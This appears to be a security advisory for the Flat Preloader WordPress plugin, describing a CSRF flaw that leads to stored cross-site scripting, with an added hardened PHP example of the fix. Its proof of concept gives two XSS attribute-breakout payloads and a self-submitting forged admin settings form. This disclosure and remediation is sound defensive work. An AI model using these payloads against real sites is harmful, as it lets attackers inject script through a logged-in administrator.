Flat Preloader < 1.5.4 - CSRF to Stored Cross-Site Scripting

Description

The plugin does not enforce nonce checks when saving its settings, and does not sanitise or escape them either, which could allow attackers to make a logged-in admin change them to a Cross-Site Scripting payload (triggered either in the frontend or backend depending on the payload).

The CSRF was fixed in 1.5.1; however, further sanitisation was done in v1.5.2 to 1.5.4.

Proof of Concept

Depending on the payload, the XSS will be triggered either in the frontend or backend:

Frontend: " onload=alert(/XSS/)//
Backend: " style=animation-name:rotation onanimationstart=alert(/XSS/)//

<form action="https://example.com/wp-admin/options-general.php?page=flat-preloader" method="post" id="csrf">
<input type="hidden" name="preloader-style" value="windows-10/circles-menu-1.gif">
<input type="hidden" name="preloader-display" value="all">
<input type="hidden" name="preloader[custom_image_url]" value="">
<input type="hidden" name="preloader[text_under_icon]" value="">
<input type="hidden" name="preloader[delay_time]" value="">
<input type="hidden" name="preloader[alt]" value='PAYLOAD'>
<input type="hidden" name="save-option" value="Save Changes">
</form>
<script>csrf.submit()</script>
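A hardened version of the settings save and render path that closes both issues the description names (no nonce check, no sanitisation or escaping), written against the same POST field names the PoC form uses. This is an added illustration, not the plugin's own code; the option name, nonce action and fp_example_* function names are assumptions.

```php
<?php
// Nonce + capability checks on save, sanitisation before storing, escaping
// on output. Illustrative code; option name, nonce action and function
// names are assumptions, not the plugin's own.

// Settings form: wp_nonce_field() emits the token the save handler verifies.
function fp_example_render_settings_form() {
    $opts = get_option( 'fp_example_preloader', array() );
    echo '<form method="post" action="">';
    wp_nonce_field( 'fp_example_save_settings', 'fp_example_nonce' );
    echo '<input type="text" name="preloader[alt]" value="'
        . esc_attr( $opts['alt'] ?? '' ) . '">';
    echo '<input type="submit" name="save-option" value="Save Changes">';
    echo '</form>';
}

// Save handler: a cross-site form cannot carry a valid nonce for the victim,
// so check_admin_referer() stops the request before anything is stored.
function fp_example_save_settings() {
    if ( ! isset( $_POST['save-option'] ) ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    check_admin_referer( 'fp_example_save_settings', 'fp_example_nonce' );

    $raw = ( isset( $_POST['preloader'] ) && is_array( $_POST['preloader'] ) )
        ? wp_unslash( $_POST['preloader'] ) : array();
    // Sanitise on input: strip tags and control characters from free text,
    // keep only a valid URL, force the delay to a non-negative integer.
    $clean = array(
        'alt'              => sanitize_text_field( $raw['alt'] ?? '' ),
        'text_under_icon'  => sanitize_text_field( $raw['text_under_icon'] ?? '' ),
        'custom_image_url' => esc_url_raw( $raw['custom_image_url'] ?? '' ),
        'delay_time'       => absint( $raw['delay_time'] ?? 0 ),
    );
    update_option( 'fp_example_preloader', $clean );
}
add_action( 'admin_init', 'fp_example_save_settings' );

// Frontend output: esc_attr() encodes the quote the PoC payloads rely on to
// break out of the alt attribute, so stored text stays text even if an
// older, unsanitised value is still in the database.
function fp_example_render_preloader_img( $src ) {
    $opts = get_option( 'fp_example_preloader', array() );
    return '<img src="' . esc_url( $src ) . '" alt="'
        . esc_attr( $opts['alt'] ?? '' ) . '">';
}
```

Escaping on output is kept even though input is sanitised, because settings written by a vulnerable version before the upgrade remain in the database unchanged.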

Affects Plugins

Fixed in 1.5.4

Classification

Miscellaneous

Original Researcher
apple502j
Submitter
apple502j
Verified
Yes

Timeline

Publicly Published
2021-09-28
Added
2021-09-28
Last Updated
2022-04-08